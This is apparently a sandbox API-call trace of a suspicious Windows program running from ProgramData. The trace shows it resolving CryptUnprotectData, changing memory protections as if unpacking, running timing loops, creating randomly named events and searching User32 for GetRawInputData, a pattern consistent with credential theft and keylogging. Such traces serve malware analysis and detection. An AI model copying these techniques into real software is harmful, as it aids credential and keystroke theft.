[0287.671] GetProcAddress (hModule=0x74690000, lpProcName="CryptUnprotectData") returned 0x746b3140 [0287.672] GetProcAddress (hModule=0x74690000, lpProcName="CryptStringToBinaryA") returned 0x746ad6d0 [0287.672] GetProcAddress (hModule=0x74690000, lpProcName="CryptStringToBinaryW") returned 0x746ad5a0 [0287.672] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75820000 [0287.673] GetProcAddress (hModule=0x75820000, lpProcName="GetModuleFileNameExW") returned 0x758213e0 [0287.673] VirtualProtect (in: lpAddress=0x2bf1000, dwSize=0x13000, flNewProtect=0x20, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0287.684] VirtualProtect (in: lpAddress=0x2c04000, dwSize=0x4a00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0287.684] VirtualProtect (in: lpAddress=0x2c09000, dwSize=0x600, flNewProtect=0x4, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0287.684] VirtualProtect (in: lpAddress=0x2d3f000, dwSize=0x2e00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0287.684] VirtualProtect (in: lpAddress=0x2d42000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0287.684] VirtualProtect (in: lpAddress=0x2d43000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0287.684] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0287.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2bf5ce2, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0287.691] Sleep (dwMilliseconds=0x320) [0288.507] Sleep (dwMilliseconds=0x320) [0289.319] Sleep (dwMilliseconds=0x320) Thread: id = 58 os_tid = 0xfa8 Thread: id = 59 os_tid = 0xfac [0287.693] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\" " [0287.693] GetStartupInfoA (in: lpStartupInfo=0x21cff3c | out: lpStartupInfo=0x21cff3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0287.693] GetProcessHeap () returned 0x8a0000 [0287.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x80) returned 0x8a6620 [0287.694] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1a8 [0287.694] GetProcessHeap () returned 0x8a0000 [0287.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x8ae740 [0287.694] GetProcessHeap () returned 0x8a0000 [0287.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x8b20c0 [0287.694] GetProcessHeap () returned 0x8a0000 [0287.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28) returned 0x8b8b70 [0287.694] GetProcessHeap () returned 0x8a0000 [0287.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x50) returned 0x8aa2e0 [0287.694] GetProcessHeap () returned 0x8a0000 [0287.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0xa0) returned 0x8a8f98 [0287.694] CoInitialize (pvReserved=0x0) returned 0x0 [0287.695] CoCreateInstance (in: rclsid=0x2c045e0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2c073f0*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x21cfef8 | out: ppv=0x21cfef8*=0xb304a0) returned 0x0 [0287.721] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0xb304a0, clsidDeviceClass=0x2c045d0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x21cfefc, dwFlags=0x0 | out: ppenumMoniker=0x21cfefc*=0x0) returned 0x1 [0287.789] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x6f0000 [0287.789] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x700000 [0287.790] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x830000 [0287.790] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x840000 [0287.790] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x850000 [0287.791] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x860000 [0287.791] GetProcessHeap () returned 0x8a0000 [0287.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8ba858 [0287.791] GetProcessHeap () returned 0x8a0000 [0287.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8ba830 [0287.791] GetProcessHeap () returned 0x8a0000 [0287.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8ba8a8 [0287.791] GetProcessHeap () returned 0x8a0000 [0287.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8ba8d0 [0287.791] GetProcessHeap () returned 0x8a0000 [0287.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8ba920 [0287.791] GetProcessHeap () returned 0x8a0000 [0287.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8ba970 [0287.792] Sleep (dwMilliseconds=0x1) [0287.800] GetTickCount () returned 0x1bfb1 [0287.800] Sleep (dwMilliseconds=0x1) [0287.815] GetTickCount () returned 0x1bfc1 [0287.815] Sleep (dwMilliseconds=0x1) [0287.832] GetTickCount () returned 0x1bfd0 [0287.833] Sleep (dwMilliseconds=0x1) [0287.847] GetTickCount () returned 0x1bfe0 [0287.847] Sleep (dwMilliseconds=0x1) [0287.862] GetTickCount () returned 0x1bfef [0287.862] Sleep (dwMilliseconds=0x1) [0287.883] GetTickCount () returned 0x1bfff [0287.883] Sleep (dwMilliseconds=0x1) [0287.893] GetTickCount () returned 0x1c00f [0287.893] Sleep (dwMilliseconds=0x1) [0287.908] GetTickCount () returned 0x1c01e [0287.909] Sleep (dwMilliseconds=0x1) [0287.924] GetTickCount () returned 0x1c02e [0287.924] Sleep (dwMilliseconds=0x1) [0287.940] GetTickCount () returned 0x1c03e [0287.940] Sleep (dwMilliseconds=0x1) [0287.955] GetTickCount () returned 0x1c04d [0287.955] Sleep (dwMilliseconds=0x1) [0287.971] GetTickCount () returned 0x1c05d [0287.971] Sleep (dwMilliseconds=0x1) [0287.987] GetTickCount () returned 0x1c06c [0287.987] Sleep (dwMilliseconds=0x1) [0288.002] GetTickCount () returned 0x1c07c [0288.002] Sleep (dwMilliseconds=0x1) [0288.018] GetTickCount () returned 0x1c08c [0288.018] Sleep (dwMilliseconds=0x1) [0288.034] GetTickCount () returned 0x1c09b [0288.034] Sleep (dwMilliseconds=0x1) [0288.049] GetTickCount () returned 0x1c0ab [0288.049] Sleep (dwMilliseconds=0x1) [0288.065] GetTickCount () returned 0x1c0bb [0288.065] Sleep (dwMilliseconds=0x1) [0288.081] GetTickCount () returned 0x1c0ca [0288.081] Sleep (dwMilliseconds=0x1) [0288.096] GetTickCount () returned 0x1c0da [0288.096] Sleep (dwMilliseconds=0x1) [0288.178] GetTickCount () returned 0x1c128 [0288.178] Sleep (dwMilliseconds=0x1) [0288.190] GetTickCount () returned 0x1c138 [0288.190] Sleep (dwMilliseconds=0x1) [0288.205] GetTickCount () returned 0x1c147 [0288.205] Sleep (dwMilliseconds=0x1) [0288.221] GetTickCount () returned 0x1c157 [0288.221] Sleep (dwMilliseconds=0x1) [0288.268] GetTickCount () returned 0x1c186 [0288.268] Sleep (dwMilliseconds=0x1) [0288.284] GetTickCount () returned 0x1c195 [0288.284] Sleep (dwMilliseconds=0x1) [0288.301] GetTickCount () returned 0x1c1a5 [0288.301] Sleep (dwMilliseconds=0x1) [0288.315] GetTickCount () returned 0x1c1b5 [0288.315] Sleep (dwMilliseconds=0x1) [0288.330] GetTickCount () returned 0x1c1c4 [0288.330] Sleep (dwMilliseconds=0x1) [0288.402] GetTickCount () returned 0x1c203 [0288.402] Sleep (dwMilliseconds=0x1) [0288.407] GetTickCount () returned 0x1c212 [0288.407] Sleep (dwMilliseconds=0x1) [0288.408] GetTickCount () returned 0x1c212 [0288.408] Sleep (dwMilliseconds=0x1) [0288.410] GetTickCount () returned 0x1c212 [0288.410] Sleep (dwMilliseconds=0x1) [0288.413] GetTickCount () returned 0x1c212 [0288.413] Sleep (dwMilliseconds=0x1) [0288.431] GetTickCount () returned 0x1c222 [0288.431] Sleep (dwMilliseconds=0x1) [0288.446] GetTickCount () returned 0x1c232 [0288.446] Sleep (dwMilliseconds=0x1) [0288.460] GetTickCount () returned 0x1c241 [0288.460] Sleep (dwMilliseconds=0x1) [0288.475] GetTickCount () returned 0x1c251 [0288.475] Sleep (dwMilliseconds=0x1) [0288.491] GetTickCount () returned 0x1c260 [0288.491] Sleep (dwMilliseconds=0x1) [0288.507] GetTickCount () returned 0x1c270 [0288.507] Sleep (dwMilliseconds=0x1) [0288.522] GetTickCount () returned 0x1c280 [0288.522] Sleep (dwMilliseconds=0x1) [0288.541] GetTickCount () returned 0x1c28f [0288.541] Sleep (dwMilliseconds=0x1) [0288.555] GetTickCount () returned 0x1c29f [0288.555] Sleep (dwMilliseconds=0x1) [0288.569] GetTickCount () returned 0x1c2af [0288.569] Sleep (dwMilliseconds=0x1) [0288.585] GetTickCount () returned 0x1c2be [0288.585] Sleep (dwMilliseconds=0x1) [0288.600] GetTickCount () returned 0x1c2ce [0288.600] Sleep (dwMilliseconds=0x1) [0288.629] GetTickCount () returned 0x1c2dd [0288.629] Sleep (dwMilliseconds=0x1) [0288.631] GetTickCount () returned 0x1c2ed [0288.631] Sleep (dwMilliseconds=0x1) [0288.647] GetTickCount () returned 0x1c2fd [0288.647] Sleep (dwMilliseconds=0x1) [0288.663] GetTickCount () returned 0x1c30c [0288.663] Sleep (dwMilliseconds=0x1) [0288.681] GetTickCount () returned 0x1c31c [0288.681] Sleep (dwMilliseconds=0x1) [0288.694] GetTickCount () returned 0x1c32c [0288.695] Sleep (dwMilliseconds=0x1) [0288.839] GetTickCount () returned 0x1c3b8 [0288.839] Sleep (dwMilliseconds=0x1) [0288.850] GetTickCount () returned 0x1c3c8 [0288.850] Sleep (dwMilliseconds=0x1) [0288.868] GetTickCount () returned 0x1c3d7 [0288.868] Sleep (dwMilliseconds=0x1) [0288.882] GetTickCount () returned 0x1c3e7 [0288.882] Sleep (dwMilliseconds=0x1) [0288.897] GetTickCount () returned 0x1c3f7 [0288.897] Sleep (dwMilliseconds=0x1) [0288.913] GetTickCount () returned 0x1c406 [0288.913] Sleep (dwMilliseconds=0x1) [0288.928] GetTickCount () returned 0x1c416 [0288.928] Sleep (dwMilliseconds=0x1) [0288.944] GetTickCount () returned 0x1c426 [0288.944] lstrlenA (lpString="L4aOdoR2kC") returned 10 [0288.944] lstrlenA (lpString="L4aOdoR2kC") returned 10 [0288.944] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.945] lstrcpyA (in: lpString1=0x870000, lpString2="L4aOdoR2kC" | out: lpString1="L4aOdoR2kC") returned="L4aOdoR2kC" [0288.945] VirtualFree (lpAddress=0x6f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.946] lstrlenA (lpString="L4aOdoR2kC") returned 10 [0288.946] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x6f0000 [0288.946] lstrcatA (in: lpString1="", lpString2="L4aOdoR2kC" | out: lpString1="L4aOdoR2kC") returned="L4aOdoR2kC" [0288.947] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="L4aOdoR2kC") returned 0x22c [0288.947] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.947] lstrlenA (lpString="rquG4Uf0mm") returned 10 [0288.947] lstrlenA (lpString="rquG4Uf0mm") returned 10 [0288.947] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.948] lstrcpyA (in: lpString1=0x870000, lpString2="rquG4Uf0mm" | out: lpString1="rquG4Uf0mm") returned="rquG4Uf0mm" [0288.948] VirtualFree (lpAddress=0x700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.949] lstrlenA (lpString="rquG4Uf0mm") returned 10 [0288.949] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x700000 [0288.949] lstrcatA (in: lpString1="", lpString2="rquG4Uf0mm" | out: lpString1="rquG4Uf0mm") returned="rquG4Uf0mm" [0288.949] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="rquG4Uf0mm") returned 0x230 [0288.949] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.950] lstrlenA (lpString="O0hyig70Kq") returned 10 [0288.950] lstrlenA (lpString="O0hyig70Kq") returned 10 [0288.950] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.950] lstrcpyA (in: lpString1=0x870000, lpString2="O0hyig70Kq" | out: lpString1="O0hyig70Kq") returned="O0hyig70Kq" [0288.950] VirtualFree (lpAddress=0x830000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.951] lstrlenA (lpString="O0hyig70Kq") returned 10 [0288.951] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x830000 [0288.951] lstrcatA (in: lpString1="", lpString2="O0hyig70Kq" | out: lpString1="O0hyig70Kq") returned="O0hyig70Kq" [0288.951] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="O0hyig70Kq") returned 0x258 [0288.951] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.952] lstrlenA (lpString="Ac4E8CLmMA") returned 10 [0288.952] lstrlenA (lpString="Ac4E8CLmMA") returned 10 [0288.952] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.952] lstrcpyA (in: lpString1=0x870000, lpString2="Ac4E8CLmMA" | out: lpString1="Ac4E8CLmMA") returned="Ac4E8CLmMA" [0288.952] VirtualFree (lpAddress=0x840000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.953] lstrlenA (lpString="Ac4E8CLmMA") returned 10 [0288.953] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x840000 [0288.953] lstrcatA (in: lpString1="", lpString2="Ac4E8CLmMA" | out: lpString1="Ac4E8CLmMA") returned="Ac4E8CLmMA" [0288.953] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="Ac4E8CLmMA") returned 0x25c [0288.953] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.953] lstrlenA (lpString="wG3aGsHGhS") returned 10 [0288.953] lstrlenA (lpString="wG3aGsHGhS") returned 10 [0288.954] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.954] lstrcpyA (in: lpString1=0x870000, lpString2="wG3aGsHGhS" | out: lpString1="wG3aGsHGhS") returned="wG3aGsHGhS" [0288.954] VirtualFree (lpAddress=0x850000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.954] lstrlenA (lpString="wG3aGsHGhS") returned 10 [0288.954] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x850000 [0288.955] lstrcatA (in: lpString1="", lpString2="wG3aGsHGhS" | out: lpString1="wG3aGsHGhS") returned="wG3aGsHGhS" [0288.955] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="wG3aGsHGhS") returned 0x260 [0288.955] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.955] lstrlenA (lpString="SAweVIX2ei") returned 10 [0288.955] lstrlenA (lpString="SAweVIX2ei") returned 10 [0288.955] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.956] lstrcpyA (in: lpString1=0x870000, lpString2="SAweVIX2ei" | out: lpString1="SAweVIX2ei") returned="SAweVIX2ei" [0288.956] VirtualFree (lpAddress=0x860000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.957] lstrlenA (lpString="SAweVIX2ei") returned 10 [0288.957] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x860000 [0288.957] lstrcatA (in: lpString1="", lpString2="SAweVIX2ei" | out: lpString1="SAweVIX2ei") returned="SAweVIX2ei" [0288.957] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="SAweVIX2ei") returned 0x264 [0288.957] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.959] GetProcessHeap () returned 0x8a0000 [0288.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8bab80 [0288.960] GetProcessHeap () returned 0x8a0000 [0288.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7c) returned 0x8cac20 [0288.960] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x268 [0288.960] LoadLibraryW (lpLibFileName="User32.dll") returned 0x756d0000 [0288.961] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0288.968] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0288.969] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckDBCSEnabledExt", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckProcessForClipboardAccess", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckProcessSession", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0288.970] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0288.971] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowExW", 